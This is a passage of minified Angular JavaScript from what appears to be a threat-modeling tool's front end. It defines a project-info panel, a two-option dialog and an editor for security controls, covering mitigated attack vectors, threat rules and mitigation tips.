be(e),Me(V(2).Project.Description=n)}),u(),s(17,"\n "),u(),s(18,"\n "),m(19,"mat-form-field",8),s(20,"\n "),m(21,"mat-label"),s(22),oe(23,"translate"),u(),s(24,"\n "),m(25,"input",10),he("ngModelChange",function(n){return be(e),Me(V(2).Project.UserVersion=n)}),u(),s(26,"\n "),u(),s(27,"\n "),u(),s(28,"\n "),m(29,"div",11),s(30,"\n "),m(31,"div",12),s(32,"\n "),m(33,"img",13,14),he("click",function(){be(e);const n=V(2);return Me(n.ViewImage(n.Project.Image))}),u(),s(35,"\n "),m(36,"input",15,16),he("change",function(n){return be(e),Me(V(2).OnFileSelected(n))}),u(),s(38,"\n "),ne(39,$Se,8,2,"div",17),s(40,"\n "),m(41,"div",18),s(42,"\n "),m(43,"button",19),he("click",function(){return be(e),Me(Ti(37).click())}),s(44,"\n "),m(45,"mat-icon"),s(46,"add_photo_alternate"),u(),s(47,"\n "),u(),s(48,"\n "),u(),s(49,"\n "),u(),s(50,"\n "),u(),s(51,"\n "),u(),s(52,"\n "),m(53,"div",6),s(54,"\n "),m(55,"div",20),s(56,"\n "),m(57,"mat-list",21),s(58,"\n "),m(59,"div",22),s(60),oe(61,"translate"),m(62,"button",23),he("click",function(){return be(e),Me(V(2).AddUser())}),oe(63,"translate"),m(64,"mat-icon"),s(65,"add"),u()()(),s(66,"\n "),ne(67,KSe,17,11,"mat-list-item",24),s(68,"\n "),u(),s(69,"\n "),u(),s(70,"\n "),m(71,"div",25),s(72,"\n "),ne(73,YSe,24,10,"div",26),s(74,"\n "),u(),s(75,"\n "),u(),s(76,"\n "),u(),s(77,"\n "),m(78,"div"),s(79,"\n "),m(80,"h4"),s(81),oe(82,"translate"),u(),s(83,"\n "),m(84,"div",27),s(85,"\n "),m(86,"mat-slide-toggle",28),he("change",function(n){return be(e),Me(V(2).OnTestingChanged(n))}),s(87),oe(88,"translate"),u(),s(89,"\n "),it(90,"br"),s(91,"\n "),m(92,"mat-slide-toggle",29),he("ngModelChange",function(n){return be(e),Me(V(2).Project.Settings.ThreatActorToAttackScenario=n)}),s(93),oe(94,"translate"),u(),s(95,"\n "),u(),s(96,"\n "),u(),s(97,"\n "),m(98,"div"),s(99,"\n "),m(100,"mat-accordion",30),s(101,"\n "),ne(102,eke,17,4,"mat-expansion-panel",31),s(103,"\n "),u(),s(104,"\n "),u(),s(105,"\n ")}if(2&t){const e=V(2);g(2),ke(e.Project.Name),g(11),ke(re(14,23,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.Project.Description),g(6),ke(re(23,25,"properties.Version")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.Project.UserVersion),g(8),F("src",e.Project.Image,nm),g(6),F("ngIf",e.Project.Image),g(18),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),ct("",re(61,27,"properties.Participants")," "),g(2),at("matTooltip",re(63,29,"general.Add")),g(5),F("ngForOf",e.Project.Participants),g(6),F("ngIf",e.selectedUser),g(8),ke(re(82,31,"general.Settings")),g(5),F("checked",e.Project.HasTesting),g(1),ke(re(88,33,"general.TestCases")),g(5),F("ngModel",e.Project.Settings.ThreatActorToAttackScenario),g(1),ke(re(94,35,"dialog.modelinfo.ThreatSourceToAttackScenario")),g(9),F("ngIf",e.GHProject)}}function ike(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n ",re(1,1,"status-bar.TasksAndNotes"),"\n ")}function ake(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n ",re(1,1,"dialog.modelchanges.Changes"),"\n ")}function nke(t,a){1&t&&(s(0),oe(1,"translate")),2&t&&ct("\n ",re(1,1,"dialog.progress.title"),"\n ")}function oke(t,a){if(1&t){const e=Ye();m(0,"div",1),s(1,"\n "),m(2,"mat-tab-group",2),he("selectedIndexChange",function(n){return be(e),Me(V().SetSelectedTabIndex(n))})("selectedTabChange",function(){return be(e),Me(Ti(23).UpdateChanges())}),s(3,"\n "),m(4,"mat-tab"),s(5,"\n "),ne(6,QSe,2,3,"ng-template",3),s(7,"\n "),ne(8,tke,106,37,"ng-template",4),s(9,"\n "),u(),s(10,"\n "),m(11,"mat-tab"),s(12,"\n "),ne(13,ike,2,3,"ng-template",3),s(14,"\n "),it(15,"app-model-tasks"),s(16,"\n "),u(),s(17,"\n "),m(18,"mat-tab"),s(19,"\n "),ne(20,ake,2,3,"ng-template",3),s(21,"\n "),it(22,"app-model-changes",null,5),s(24,"\n "),u(),s(25,"\n "),m(26,"mat-tab"),s(27,"\n "),ne(28,nke,2,3,"ng-template",3),s(29,"\n "),m(30,"h4"),s(31),oe(32,"translate"),u(),s(33,"\n "),it(34,"app-progress-tracker"),s(35,"\n "),u(),s(36,"\n "),u(),s(37,"\n"),u()}if(2&t){const e=V();g(2),F("selectedIndex",e.GetSelectedTabIndex()),g(29),za("",re(32,3,"status-bar.progress"),": ",e.GetProgress(),"")}}let w5=(()=>{class t{constructor(e,i,n,r){this.dataService=e,this.theme=i,this.dialog=n,this.locStorage=r,this.refreshNodes=new Tt}ngOnInit(){this.GHProject=this.dataService.SelectedFile,this.Project=this.dataService.Project,this.dataService.GetGHProjectHistory().then(e=>this.commits=e)}OnFileSelected(e){return function(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}(this,void 0,void 0,function*(){if(e.target.files&&e.target.files[0]){const i={maxSizeMB:1,maxWidthOrHeight:700,useWebWorker:!0};try{const n=yield(0,WG.Z)(e.target.files[0],i);let r=new FileReader;r.readAsDataURL(n),r.onload=c=>{this.Project.Image=c.target.result.toString()}}catch(n){console.log(n)}}})}ViewImage(e){this.dialog.OpenViewImageDialog(e)}AddUser(){this.Project.Participants.push({Name:Gi.FindUniqueName("Participant",this.Project.Participants.map(e=>e.Name)),Email:""}),this.selectedUser=this.Project.Participants[this.Project.Participants.length-1]}DeleteUser(e){const i=this.Project.Participants.indexOf(e);i>=0&&(this.Project.Participants.splice(i,1),this.selectedUser==e&&(this.selectedUser=null))}OnTestingChanged(e){e.checked?(this.Project.CreateTesting(),this.refreshNodes.emit()):this.dialog.OpenDeleteObjectDialog(this.Project.GetTesting()).subscribe(i=>{i?(this.Project.DeleteTesting(),this.refreshNodes.emit()):e.source.checked=!0})}GetRemoveBtnLeft(e){return!e||e.width<25?"25px":(e.width-25).toString()+"px"}GetProgress(){if(this.dataService.Project){let e=Object.values(this.dataService.Project.ProgressTracker);return 0==e.length?"0%":(100*e.filter(i=>1==i).length/e.length).toFixed(0)+"%"}}GetSelectedTabIndex(){let e=this.locStorage.Get(si.PAGE_MODELING_MODEL_TAB_INDEX);return null!=e?e:0}SetSelectedTabIndex(e){this.locStorage.Set(si.PAGE_MODELING_MODEL_TAB_INDEX,e)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi),Ee(Oa),Ee(Wn),Ee(_r))},t.\u0275cmp=Wt({type:t,selectors:[["app-model-info"]],outputs:{refreshNodes:"refreshNodes"},decls:1,vars:1,consts:[["style","margin: 0 10px;",4,"ngIf"],[2,"margin","0 10px"],["dynamicHeight","",3,"selectedIndex","selectedIndexChange","selectedTabChange"],["mat-tab-label",""],["matTabContent",""],["changes",""],[1,"row"],[1,"col1"],["appearance","fill",2,"width","350px"],["matInput","","cdkTextareaAutosize","","cdkAutosizeMinRows","3",3,"spellcheck","ngModel","ngModelChange"],["matInput","",3,"spellcheck","ngModel","ngModelChange"],[1,"col2"],[1,"imgContainer"],[3,"src","click"],["projImg",""],["type","file","accept","image/*",1,"fileInput",3,"change"],["fileUpload",""],["class","removeBtn",3,"left",4,"ngIf"],[1,"uploadBtn"],["mat-mini-fab","","color","primary",3,"click"],[1,"column1"],[1,"prop-list"],["mat-subheader",""],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],["matTooltipShowDelay","1000",3,"highlight-light","highlight-dark","matTooltip","click",4,"ngFor","ngForOf"],[1,"column2"],["style","margin: 10px 0 10px 10px",4,"ngIf"],[2,"margin-left","20px","margin-bottom","15px"],["color","primary",3,"checked","change"],["color","primary",3,"ngModel","ngModelChange"],[1,"expansion-panel-headers-align"],[4,"ngIf"],[1,"removeBtn"],["mat-icon-button","","color","primary",3,"click"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-list-icon",""],["mat-line",""],[1,"primary-color",3,"href"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","auto",3,"matTooltip","click"],[2,"margin","10px 0 10px 10px"],["appearance","fill",1,"property-form-field"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngIf"],["matInput","",3,"ngModel","ngModelChange"],["matSuffix","","mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],["matExpansionPanelContent",""],[4,"ngFor","ngForOf"],[2,"text-align","right"],["mat-icon-button","","matTooltipShowDelay","1000",2,"width","20px","height","20px","line-height","20px",3,"matTooltip","click"]],template:function(e,i){1&e&&ne(0,oke,38,5,"div",0),2&e&&F("ngIf",!!i.Project)},styles:['.primary-color[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%] as-split[_ngcontent-%COMP%] .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.column1[_ngcontent-%COMP%]{float:left;width:350px}.column2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.prop-list[_ngcontent-%COMP%] .mat-list-item[_ngcontent-%COMP%]{height:48px;cursor:pointer}.prop-list[_ngcontent-%COMP%] .mat-list-item-content{padding:0 8px!important}.prop-list[_ngcontent-%COMP%] .mat-list-text{padding-left:8px!important}.prop-list[_ngcontent-%COMP%] .mat-subheader[_ngcontent-%COMP%]{display:contents}.prop-list-light[_ngcontent-%COMP%]{border-right:1px solid rgba(0,0,0,.1)}.prop-list-dark[_ngcontent-%COMP%]{border-right:1px solid rgba(255,255,255,.1)}.highlight-light[_ngcontent-%COMP%]{background-color:#0000001a}.highlight-dark[_ngcontent-%COMP%]{background-color:#ffffff1a}.property-form-field[_ngcontent-%COMP%]{width:300px}.reorder-list[_ngcontent-%COMP%]{max-width:100%;display:block;border-radius:4px;overflow:hidden}.reorder-box[_ngcontent-%COMP%]{padding:5px 10px;color:#000000de;display:flex;flex-direction:row;align-items:center;box-sizing:border-box;cursor:move;font-size:14px}.cdk-drag-preview[_ngcontent-%COMP%]{box-sizing:border-box;border-radius:4px;box-shadow:0 5px 5px -3px #0003,0 8px 10px 1px #00000024,0 3px 14px 2px #0000001f}.cdk-drag-placeholder[_ngcontent-%COMP%]{opacity:0}.cdk-drag-animating[_ngcontent-%COMP%]{transition:transform .25s cubic-bezier(0,0,.2,1)}.reorder-box[_ngcontent-%COMP%]:last-child{border:none}.reorder-list.cdk-drop-list-dragging[_ngcontent-%COMP%] .reorder-box[_ngcontent-%COMP%]:not(.cdk-drag-placeholder){transition:transform .25s cubic-bezier(0,0,.2,1)}.col1[_ngcontent-%COMP%]{float:left;width:350px}.col2[_ngcontent-%COMP%]{float:left;width:calc(100% - 350px)}.row[_ngcontent-%COMP%]{min-width:660px}.row[_ngcontent-%COMP%]:after{content:"";display:table;clear:both}.imgContainer[_ngcontent-%COMP%]{position:relative;margin-left:10px}.imgContainer[_ngcontent-%COMP%] img[_ngcontent-%COMP%]{max-height:230px;height:auto}.imgContainer[_ngcontent-%COMP%] .uploadBtn[_ngcontent-%COMP%]{position:absolute;top:25px;left:25px;transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%)}.imgContainer[_ngcontent-%COMP%] .removeBtn[_ngcontent-%COMP%]{position:absolute;top:25px;transform:translate(-50%,-50%);-ms-transform:translate(-50%,-50%)}.fileInput[_ngcontent-%COMP%]{display:none}']}),t})();function rke(t,a){if(1&t&&(m(0,"div",4),s(1),u()),2&t){const e=V();g(1),ct("\n ",e.data.textContent,"\n ")}}function ske(t,a){1&t&&Ir(0)}function cke(t,a){if(1&t&&(bt(0),ne(1,ske,1,0,"ng-container",5),Mt()),2&t){const e=V();g(1),F("ngComponentOutlet",e.data.component)("ngComponentOutletInjector",e.dataInjector)}}function lke(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n "),m(2,"button",6),he("click",function(){return be(e),Me(V().data.onPrevious())}),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"button",6),he("click",function(){return be(e),Me(V().data.onNext())}),s(7),oe(8,"translate"),u(),s(9,"\n "),Mt()}if(2&t){const e=V();g(2),F("disabled",!e.data.canPrevious()),g(1),ke(re(4,4,"tour.prev")),g(3),F("disabled",!e.data.canNext()),g(1),ke(re(8,6,"tour.next"))}}function dke(t,a){if(1&t&&(m(0,"button",9),s(1),u()),2&t){const e=V(2);g(1),ke(e.data.resultFalseText)}}function mke(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"button",7),s(3),u(),s(4,"\n "),ne(5,dke,2,1,"button",8),s(6,"\n "),Mt()),2&t){const e=V();g(2),F("disabled",!e.data.resultTrueEnabled())("mat-dialog-close",!0),g(1),ke(e.data.resultTrueText),g(2),F("ngIf",e.data.hasResultFalse)}}function uke(t,a){if(1&t&&(m(0,"button",12),s(1),u()),2&t){const e=V(2);g(1),ke(e.data.resultFalseText)}}function hke(t,a){if(1&t&&(bt(0),s(1,"\n "),m(2,"button",10),s(3),u(),s(4,"\n "),ne(5,uke,2,1,"button",11),s(6,"\n "),Mt()),2&t){const e=V();g(2),F("disabled",!e.data.resultTrueEnabled())("mat-dialog-close",!0),g(1),ke(e.data.resultTrueText),g(2),F("ngIf",e.data.hasResultFalse)}}let _M=(()=>{class t{constructor(e,i,n){this.dialogRef=e,this.data=i,this.injector=n}ngOnInit(){if(this.data.component&&this.data.componentInputData){let e=[];this.data.componentInputData.forEach(i=>{e.push({provide:i.Key,useValue:i.Value})}),this.dataInjector=Ko.create({providers:e,parent:this.injector})}}onKeyDown(e){var i;this.data.canIterate&&!["INPUT","TEXTAREA"].includes(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)&&("ArrowRight"==e.key&&this.data.canNext()?(e.preventDefault(),e.stopPropagation(),this.data.onNext()):"ArrowLeft"==e.key&&this.data.canPrevious()&&(e.preventDefault(),e.stopPropagation(),this.data.onPrevious()))}}return t.\u0275fac=function(e){return new(e||t)(Ee(Gh),Ee(_p),Ee(Ko))},t.\u0275cmp=Wt({type:t,selectors:[["app-two-options-dialog"]],hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},decls:18,vars:6,consts:[["mat-dialog-title",""],["style","white-space: pre-line",4,"ngIf"],[4,"ngIf"],["align","end"],[2,"white-space","pre-line"],[4,"ngComponentOutlet","ngComponentOutletInjector"],["mat-button","",3,"disabled","click"],["mat-button","","cdkFocusInitial","",3,"disabled","mat-dialog-close"],["mat-button","","mat-dialog-close","",4,"ngIf"],["mat-button","","mat-dialog-close",""],["mat-button","",3,"disabled","mat-dialog-close"],["mat-button","","mat-dialog-close","","cdkFocusInitial","",4,"ngIf"],["mat-button","","mat-dialog-close","","cdkFocusInitial",""]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),u(),s(2,"\n"),m(3,"mat-dialog-content"),s(4,"\n "),ne(5,rke,2,1,"div",1),s(6,"\n "),ne(7,cke,2,2,"ng-container",2),s(8,"\n"),u(),s(9,"\n"),m(10,"mat-dialog-actions",3),s(11,"\n "),ne(12,lke,10,8,"ng-container",2),s(13,"\n "),ne(14,mke,7,4,"ng-container",2),s(15,"\n "),ne(16,hke,7,4,"ng-container",2),s(17,"\n"),u()),2&e&&(g(1),ke(i.data.title),g(4),F("ngIf",i.data.textContent),g(2),F("ngIf",i.data.component),g(5),F("ngIf",i.data.canIterate),g(2),F("ngIf",1==i.data.initalTrue),g(2),F("ngIf",0==i.data.initalTrue))},dependencies:[hP,Ri,da,vm,Am,Tm,Em,Xi]}),t})();function fke(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(V(3).control.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function pke(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"input",17),he("ngModelChange",function(n){return be(e),Me(V(2).control.Name=n)}),u(),s(7,"\n "),ne(8,fke,6,3,"button",18),s(9,"\n "),u()}if(2&t){const e=V(2);g(3),ke(re(4,4,"properties.Name")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.control.Name),g(2),F("ngIf",e.control.Name)}}function _ke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function gke(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",16),s(1,"\n "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n "),m(6,"mat-select",20),he("selectionChange",function(n){return be(e),Me(V(2).OnControlGroupChanged(n))}),s(7,"\n "),ne(8,_ke,2,2,"mat-option",21),s(9,"\n "),u(),s(10,"\n "),u()}if(2&t){const e=V(2);let i;g(3),ke(re(4,4,"general.Group")),g(3),at("matTooltip",null==(i=e.GetControlGroup())?null:i.Name),F("value",e.GetControlGroup()),g(2),F("ngForOf",e.GetControlGroups())}}function Cke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function yke(t,a){if(1&t&&(m(0,"mat-optgroup",23),s(1,"\n "),ne(2,Cke,2,2,"mat-option",21),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Name),g(2),F("ngForOf",e.AttackVectors)}}function bke(t,a){if(1&t&&(m(0,"mat-option",22),s(1),u()),2&t){const e=a.$implicit;F("value",e),g(1),ct("\n ",e.Name,"\n ")}}function Mke(t,a){if(1&t&&(m(0,"mat-optgroup",23),s(1,"\n "),ne(2,bke,2,2,"mat-option",21),s(3,"\n "),u()),2&t){const e=a.$implicit;F("label",e.Name),g(2),F("ngForOf",e.ThreatRules)}}function vke(t,a){if(1&t){const e=Ye();m(0,"mat-list-item",24),he("click",function(){const r=be(e).$implicit;return Me(V(2).selectedMitigationTip=r)}),s(1,"\n "),m(2,"mat-icon",25),s(3,"arrow_right"),u(),s(4,"\n "),m(5,"div",26),s(6),oe(7,"translate"),u(),s(8,"\n "),m(9,"div",26),s(10),oe(11,"translate"),u(),s(12,"\n "),m(13,"button",27),he("click",function(){const r=be(e).$implicit;return Me(V(2).DeleteTip(r))}),oe(14,"translate"),m(15,"mat-icon"),s(16,"delete"),u()(),s(17,"\n "),u()}if(2&t){const e=a.$implicit,i=V(2);Ct("highlight-light",i.selectedMitigationTip===e&&!i.theme.IsDarkMode)("highlight-dark",i.selectedMitigationTip===e&&i.theme.IsDarkMode),at("matTooltip",e.Name),g(6),ke(re(7,9,e.Name)),g(4),za("",re(11,11,"properties.LifeCycles"),": ",i.GetLifeCycleNames(e),""),g(3),at("matTooltip",re(14,13,"general.Delete"))}}function Ake(t,a){if(1&t){const e=Ye();m(0,"button",19),he("click",function(){return be(e),Me(V(3).selectedMitigationTip.Name="")}),oe(1,"translate"),s(2,"\n "),m(3,"mat-icon"),s(4,"close"),u(),s(5,"\n "),u()}2&t&&at("matTooltip",re(1,1,"general.Clear"))}function Tke(t,a){if(1&t&&(m(0,"td",33),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=V(3);g(1),ke(re(2,1,i.GetLifeCycleName(e)))}}function Eke(t,a){if(1&t){const e=Ye();m(0,"td",30)(1,"mat-checkbox",34),he("change",function(n){const c=be(e).$implicit;return Me(V(3).SetLifeCycle(c,n))}),u()()}if(2&t){const e=a.$implicit,i=V(3);g(1),F("checked",i.ContainsLifeCycle(e))}}function Dke(t,a){if(1&t){const e=Ye();m(0,"div",28),s(1,"\n "),m(2,"mat-form-field",16),s(3,"\n "),m(4,"mat-label"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"input",17),he("ngModelChange",function(n){return be(e),Me(V(2).selectedMitigationTip.Name=n)}),u(),s(9,"\n "),ne(10,Ake,6,3,"button",18),s(11,"\n "),u(),s(12,"\n "),m(13,"mat-form-field",2),s(14,"\n "),m(15,"mat-label"),s(16),oe(17,"translate"),u(),s(18,"\n "),m(19,"textarea",3),he("ngModelChange",function(n){return be(e),Me(V(2).selectedMitigationTip.Description=n)}),u(),s(20,"\n "),u(),s(21,"\n "),m(22,"table",29),s(23,"\n "),m(24,"tr"),s(25,"\n "),m(26,"td",30)(27,"strong"),s(28),oe(29,"translate"),u()(),s(30,"\n "),ne(31,Tke,3,3,"td",31),s(32,"\n "),u(),s(33,"\n "),m(34,"tr"),s(35,"\n "),m(36,"td",30)(37,"strong"),s(38),oe(39,"translate"),u()(),s(40,"\n "),ne(41,Eke,2,1,"td",32),s(42,"\n "),u(),s(43,"\n "),u(),s(44,"\n "),u()}if(2&t){const e=V(2);g(5),ke(re(6,11,"properties.Name")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMitigationTip.Name),g(2),F("ngIf",e.selectedMitigationTip.Name),g(6),ke(re(17,13,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedMitigationTip.Description),g(9),ke(re(29,15,"pages.config.control.control")),g(3),F("ngForOf",e.GetLifeCycles()),g(7),ke(re(39,17,"pages.config.control.during")),g(3),F("ngForOf",e.GetLifeCycles())}}function xke(t,a){if(1&t&&(s(0,"\n "),it(1,"app-attack-vector",36),s(2,"\n ")),2&t){const e=V().$implicit;g(1),F("canEdit",!1)("attackVector",e)}}function wke(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,xke,3,2,"ng-template",35),s(16,"\n "),u()),2&t){const e=a.$implicit;g(5),ct("\n ",re(6,2,"properties.MitigatedAttackVector"),"\n "),g(4),ct("\n ",null==e?null:e.GetProperty("Name"),"\n ")}}function Ike(t,a){if(1&t&&(s(0,"\n "),it(1,"app-threat-rule",37),s(2,"\n ")),2&t){const e=V().$implicit;g(1),F("canEdit",!1)("threatRule",e)}}function Rke(t,a){if(1&t&&(m(0,"mat-expansion-panel"),s(1,"\n "),m(2,"mat-expansion-panel-header"),s(3,"\n "),m(4,"mat-panel-title"),s(5),oe(6,"translate"),u(),s(7,"\n "),m(8,"mat-panel-description"),s(9),m(10,"mat-icon"),s(11,"info"),u(),s(12,"\n "),u(),s(13,"\n "),u(),s(14,"\n "),ne(15,Ike,3,2,"ng-template",35),s(16,"\n "),u()),2&t){const e=a.$implicit;g(5),ct("\n ",re(6,2,"properties.MitigatedThreatRule"),"\n "),g(4),ct("\n ",null==e?null:e.GetProperty("Name"),"\n ")}}function Ske(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n "),ne(2,pke,10,6,"mat-form-field",1),s(3,"\n "),m(4,"mat-form-field",2),s(5,"\n "),m(6,"mat-label"),s(7),oe(8,"translate"),u(),s(9,"\n "),m(10,"textarea",3),he("ngModelChange",function(n){return be(e),Me(V().control.Description=n)}),u(),s(11,"\n "),u(),s(12,"\n "),ne(13,gke,11,6,"mat-form-field",1),s(14,"\n "),m(15,"mat-form-field",2),s(16,"\n "),m(17,"mat-label"),s(18),oe(19,"translate"),u(),s(20,"\n "),m(21,"mat-select",4),he("valueChange",function(n){return be(e),Me(V().control.MitigatedAttackVectors=n)}),s(22,"\n "),ne(23,yke,4,2,"mat-optgroup",5),s(24,"\n "),u(),s(25,"\n "),u(),s(26,"\n "),m(27,"mat-form-field",2),s(28,"\n "),m(29,"mat-label"),s(30),oe(31,"translate"),u(),s(32,"\n "),m(33,"mat-select",4),he("valueChange",function(n){return be(e),Me(V().control.MitigatedThreatRules=n)}),s(34,"\n "),ne(35,Mke,4,2,"mat-optgroup",5),s(36,"\n "),u(),s(37,"\n "),u(),s(38,"\n "),m(39,"div",6),s(40,"\n "),m(41,"div",7),s(42,"\n "),m(43,"mat-list",8),he("cdkDropListDropped",function(n){be(e);const r=V();return Me(r.drop(n,r.control.MitigationTips))}),s(44,"\n "),m(45,"div",9),s(46),oe(47,"translate"),m(48,"button",10),he("click",function(){return be(e),Me(V().AddTip())}),oe(49,"translate"),m(50,"mat-icon"),s(51,"add"),u()()(),s(52,"\n "),ne(53,vke,18,15,"mat-list-item",11),s(54,"\n "),u(),s(55,"\n "),u(),s(56,"\n "),m(57,"div",12),s(58,"\n "),ne(59,Dke,45,19,"div",13),s(60,"\n "),u(),s(61,"\n "),u(),s(62,"\n "),it(63,"br"),s(64,"\n "),m(65,"mat-accordion",14),s(66,"\n "),ne(67,wke,17,4,"mat-expansion-panel",15),s(68,"\n "),ne(69,Rke,17,4,"mat-expansion-panel",15),s(70,"\n "),u(),s(71,"\n "),it(72,"br"),s(73,"\n"),u()}if(2&t){const e=V();Ct("disable",!e.canEdit),g(2),F("ngIf",e.canEditName),g(5),ke(re(8,24,"properties.Description")),g(3),F("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.control.Description),g(3),F("ngIf",e.canEditGroup),g(5),ke(re(19,26,"properties.MitigatedAttackVectors")),g(3),F("value",e.control.MitigatedAttackVectors),g(2),F("ngForOf",e.GetAvailableAttackVectorGroups()),g(7),ke(re(31,28,"properties.MitigatedThreatRules")),g(3),F("value",e.control.MitigatedThreatRules),g(2),F("ngForOf",e.GetAvailableThreatRuleGroups()),g(8),Ct("prop-list-light",!e.theme.IsDarkMode)("prop-list-dark",e.theme.IsDarkMode),g(3),za("",e.control.Name," ",re(47,30,"general.Tips")," "),g(2),at("matTooltip",re(49,32,"general.Add")),g(5),F("ngForOf",e.control.MitigationTips),g(6),F("ngIf",e.selectedMitigationTip),g(8),F("ngForOf",e.control.MitigatedAttackVectors),g(2),F("ngForOf",e.control.MitigatedThreatRules)}}let T2=(()=>{class t{constructor(e,i,n,r,c,d){this.theme=n,this.dataService=r,this.dialog=c,this.translate=d,this.canEdit=!0,this.canEditName=!1,this.canEditGroup=!1,this.attackVectorGroups=null,this.threatRuleGroups=null,e&&(this.control=e,this.canEdit=!1),null!=i&&(this.canEdit=this.canEditName=this.canEditGroup=i.Value)}get control(){return this._control}set 